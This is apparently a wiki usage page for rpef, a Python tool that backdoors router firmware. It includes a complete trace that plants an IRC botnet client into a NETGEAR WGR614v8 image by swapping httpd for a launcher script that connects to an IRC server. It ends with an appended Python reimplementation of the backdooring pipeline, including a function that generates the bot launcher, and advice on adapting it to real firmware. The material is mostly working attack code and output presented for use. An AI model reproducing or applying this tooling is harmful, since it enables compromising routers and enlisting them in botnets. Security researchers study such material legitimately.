
Usage Documentation

Michael Coppola edited this page Feb 23, 2014 · 2 revisions

Each firmware image module in the framework is tagged with one of the following status labels:

  • 'Verified' - This module is confirmed to work and is stable.
  • 'Unverified' - This module is believed to work, or is expected to work with little additional effort, but has not yet been tested on a physical device.
  • 'Testing' - This module is currently under development and is unstable for the time being. Users should consider it a "work in progress."
  • 'Roadblock' - Issues have halted progress on this module for the time being. A utility that is not yet available, or significant reverse engineering work, may be needed before it can proceed.

For a list of options, run:

python rpef.py -h

For a list of all currently supported firmware targets, run:

python rpef.py -ll

A Little Architecture

The script is written for Python 2.6 and may require the installation of a few modules. It is typically invoked as:

python rpef.py <firmware image> <output file> <payload>

and accepts a number of optional switches (see -h).

The rules/ directory stores a hierarchy of rules/<vendor>/<module> directories. One module corresponds to one firmware checksum (not to one specific router), since multiple routers have been observed to run the exact same firmware. Each module contains a properties.json that stores, in order, the operations needed to unpack, backdoor, and repackage the target firmware image. The module's payloads/ directory stores cross-compiled binaries ready for deployment, and the optional dependencies/ directory stores miscellaneous files (such as header templates) that aid the process.

The utilities/ directory stores pre-compiled x86 binaries that perform tasks such as packing/unpacking filesystems, compressing/decompressing data (tasks for which no suitable Python module exists), and calculating checksums.

The payloads_src/ directory stores source code for the payloads themselves. All payloads are written from scratch to keep them as small as possible.

Example Usage

To generate a firmware image for the WGR614v8 backdoored with the botnet client, with verbose output, run:

python rpef.py WGR614v8-V1.2.10_21.0.52NA.chk WGR614v8-V1.2.10_21.0.52NA_backdoor.chk botnet -v

The process should proceed as follows (note that the checksum match in the first stage only selects the module; an image whose checksum matches no rule is unrecognized and will not be processed):

[+] Verifying checksum
	Calculated checksum: 38f238872cfb32844663a8a7d47e93d5
	Matched target: NETGEAR WGR614v8 1.2.10NA (Verified)
[+] Extracting parts from firmware image
	Step 1: Extract WGR614v8-V1.2.10_21.0.52NA.chk, Offset 58, Size 506252 -> /tmp/tmpnIWTqZ/headerkernel.bin
	Step 2: Extract WGR614v8-V1.2.10_21.0.52NA.chk, Offset 506310, Size 3063844 -> /tmp/tmpnIWTqZ/filesystem.bin
[+] Unpacking filesystem
	Step 1: unsquashfs-1.0 /tmp/tmpnIWTqZ/filesystem.bin -> /tmp/tmpnIWTqZ/extracted_fs
		Executing: utilities/unsquashfs-1.0 -dest /tmp/tmpnIWTqZ/extracted_fs /tmp/tmpnIWTqZ/filesystem.bin
		
		created 317 files
		created 32 directories
		created 53 symlinks
		created 0 devices
		created 0 fifos
[+] Inserting payload
	Step 1: Copy rules/NETGEAR/WGR614v8_1.2.10NA/payloads/botnet /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/botnet
	Step 2: Move /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/httpd /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/httpd.bak
	Step 3: Touch /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/httpd
	Step 4: Appendtext "#!/bin/msh
" >> /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/httpd
[+] INPUT REQUIRED, IP address of IRC server: 1.2.3.4
[+] INPUT REQUIRED, Port of IRC server: 6667
[+] INPUT REQUIRED, Channel to join (include #): #busticati
[+] INPUT REQUIRED, Prefix of bot nick: awesome
	Step 5: Appendtext "/usr/sbin/botnet 1.2.3.4 6667 \#busticati awesome &
" >> /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/httpd
	Step 6: Appendtext "/usr/sbin/httpd.bak
" >> /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/httpd
	Step 7: Chmod 777 /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/httpd
[+] Building filesystem
	Step 1: mksquashfs-2.1 /tmp/tmpnIWTqZ/extracted_fs, Blocksize 65536, Little endian -> /tmp/tmpnIWTqZ/newfs.bin
		Executing: utilities/mksquashfs-2.1 /tmp/tmpnIWTqZ/extracted_fs /tmp/tmpnIWTqZ/newfs.bin -b 65536 -root-owned -le
		Creating little endian 2.1 filesystem on /tmp/tmpnIWTqZ/newfs.bin, block size 65536.
		
		Little endian filesystem, data block size 65536, compressed data, compressed metadata, compressed fragments
		Filesystem size 2995.07 Kbytes (2.92 Mbytes)
			31.14% of uncompressed filesystem size (9616.55 Kbytes)
		Inode table size 3317 bytes (3.24 Kbytes)
			34.70% of uncompressed inode table size (9558 bytes)
		Directory table size 3237 bytes (3.16 Kbytes)
			52.41% of uncompressed directory table size (6176 bytes)
		Number of duplicate files found 5
		Number of inodes 404
		Number of files 319
		Number of fragments 30
		Number of symbolic links  53
		Number of device nodes 0
		Number of fifo nodes 0
		Number of socket nodes 0
		Number of directories 32
		Number of uids 1
			root (0)
		Number of gids 0
[+] Gluing parts together
	Step 1: Touch WGR614v8-V1.2.10_21.0.52NA_backdoor.chk
	Step 2: Appendfile /tmp/tmpnIWTqZ/headerkernel.bin >> WGR614v8-V1.2.10_21.0.52NA_backdoor.chk
	Step 3: Appendfile /tmp/tmpnIWTqZ/newfs.bin >> WGR614v8-V1.2.10_21.0.52NA_backdoor.chk
[+] Padding image with null bytes
	Step 1: Pad WGR614v8-V1.2.10_21.0.52NA_backdoor.chk to size 3575808 with 0 (0x00)
[+] Generating CHK header
	Step 1: packet WGR614v8-V1.2.10_21.0.52NA_backdoor.chk rules/NETGEAR/WGR614v8_1.2.10NA/dependencies/compatible.txt rules/NETGEAR/WGR614v8_1.2.10NA/dependencies/ambitCfg_NA.h
		Executing: utilities/packet -k WGR614v8-V1.2.10_21.0.52NA_backdoor.chk -b rules/NETGEAR/WGR614v8_1.2.10NA/dependencies/compatible.txt -i rules/NETGEAR/WGR614v8_1.2.10NA/dependencies/ambitCfg_NA.h
[+] Removing temporary files
	Step 1: Rmdir /tmp/tmpnIWTqZ/
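The trace above is what the rules-driven design described under "A Little Architecture" looks like when run: identify the image by checksum, slice it at fixed offsets, modify the filesystem, glue the parts back together, and pad to the flash region size. As an added example (not rpef's own code, and written for Python 3 rather than the Python 2.6 the script targets), the following reimplements that flow over a small constructed in-memory image using only the operations visible in the trace (Extract, Touch, Appendtext, Appendfile, Pad). The rule tuple layout, the sample image, the checksum table and the flash size are assumptions for illustration, not rpef's properties.json format; the unpack / payload-insert / rebuild stages, which need the squashfs utilities, are stood in for by appending a marker to the filesystem blob. The example also builds the httpd wrapper script from the four prompted inputs, escaping the channel's '#' exactly as the trace does, and refuses to pad an image that has grown past the target size, since padding cannot shrink a rebuilt filesystem that no longer fits.

```python
# Added example, not rpef's own code (Python 3): a rule-driven pipeline
# mirroring the trace above. Image, rule schema and checksum table are
# constructed for illustration; rpef's properties.json format is not shown.
import hashlib

# Constructed sample image: 64-byte header+kernel region, then a 32-byte
# stand-in for the SquashFS region. Not a real firmware image.
HEADER_KERNEL = b"HDRK" + bytes(range(60))
FILESYSTEM = b"SQFS" + bytes(28)
SAMPLE_IMAGE = HEADER_KERNEL + FILESYSTEM
FLASH_SIZE = 128  # assumed size the final image is padded to

def md5_hex(data):
    return hashlib.md5(data).hexdigest()

# Constructed rule table keyed by image checksum. Ops run in list order, as
# in the trace; the tuple layout is an assumption, not rpef's schema. The
# unpack / insert payload / rebuild stages need squashfs tools and are
# stood in for by appending a marker to the filesystem blob.
RULES = {
    md5_hex(SAMPLE_IMAGE): {
        "target": "EXAMPLE vendor/model 0.0.1 (constructed)",
        "ops": [
            ("Extract", "input", 0, 64, "headerkernel.bin"),
            ("Extract", "input", 64, 32, "filesystem.bin"),
            ("Touch", "newfs.bin"),
            ("Appendfile", "filesystem.bin", "newfs.bin"),
            ("Appendtext", "BACKDOOR\n", "newfs.bin"),
            ("Touch", "output"),
            ("Appendfile", "headerkernel.bin", "output"),
            ("Appendfile", "newfs.bin", "output"),
            ("Pad", "output", FLASH_SIZE, 0x00),
        ],
    }
}

def identify(image):
    """Select a module by checksum. This is fingerprinting, not integrity
    verification: an unknown checksum just means no module applies."""
    checksum = md5_hex(image)
    rule = RULES.get(checksum)
    if rule is None:
        raise LookupError("checksum %s matches no module" % checksum)
    return checksum, rule

def run_rules(image, ops, log=None):
    """Run an ordered op list over an in-memory workspace keyed by file
    name; return the bytes of 'output'."""
    ws = {"input": image}
    for step, op in enumerate(ops, 1):
        kind = op[0]
        if kind == "Extract":
            _, src, offset, size, dst = op
            if offset + size > len(ws[src]):
                raise ValueError("step %d: extract past end of %s" % (step, src))
            ws[dst] = ws[src][offset:offset + size]
        elif kind == "Touch":
            ws[op[1]] = b""
        elif kind == "Appendtext":
            _, text, dst = op
            ws[dst] = ws[dst] + text.encode("ascii")
        elif kind == "Appendfile":
            _, src, dst = op
            ws[dst] = ws[dst] + ws[src]
        elif kind == "Pad":
            _, dst, size, fill = op
            if len(ws[dst]) > size:  # padding cannot shrink an oversized image
                raise ValueError("step %d: %s is %d bytes, larger than %d"
                                 % (step, dst, len(ws[dst]), size))
            ws[dst] = ws[dst] + bytes([fill]) * (size - len(ws[dst]))
        else:
            raise ValueError("step %d: unknown op %r" % (step, kind))
        if log is not None:
            log.append("Step %d: %s" % (step, " ".join(map(str, op))))
    return ws["output"]

def build_wrapper(ip, port, channel, prefix, original="/usr/sbin/httpd.bak"):
    """The msh script that replaces /usr/sbin/httpd: start the client in the
    background, then run the renamed original so the web UI still comes up.
    '#' is escaped as in the trace: unescaped, the shell would read
    '#channel nick &' as a comment, losing the '&', so the script would
    block on the client and the httpd.bak line would not be reached."""
    port = int(port)
    if not 0 < port < 65536:
        raise ValueError("bad port %d" % port)
    return ("#!/bin/msh\n/usr/sbin/botnet %s %d %s %s &\n%s\n"
            % (ip, port, channel.replace("#", "\\#"), prefix, original))

def backdoor(image, log=None):
    """Identify the image, then run its module's ops; returns the padded image."""
    checksum, rule = identify(image)
    if log is not None:
        log += ["Calculated checksum: " + checksum, "Matched target: " + rule["target"]]
    return run_rules(image, rule["ops"], log)

if __name__ == "__main__":
    trace = []
    out = backdoor(SAMPLE_IMAGE, trace)
    print("\n".join(trace))
    print("output: %d bytes, md5 %s" % (len(out), md5_hex(out)))
    print(build_wrapper("1.2.3.4", "6667", "#busticati", "awesome"), end="")
```

Two checks worth keeping when adapting this to a real module: the output image's checksum will never match the rule table again (so the tool cannot re-process its own output, and a defender comparing against a vendor checksum list will see a mismatch), and any rebuilt filesystem must still fit within the original padded size or the Pad step has to fail rather than silently produce an image that is too large for the flash region.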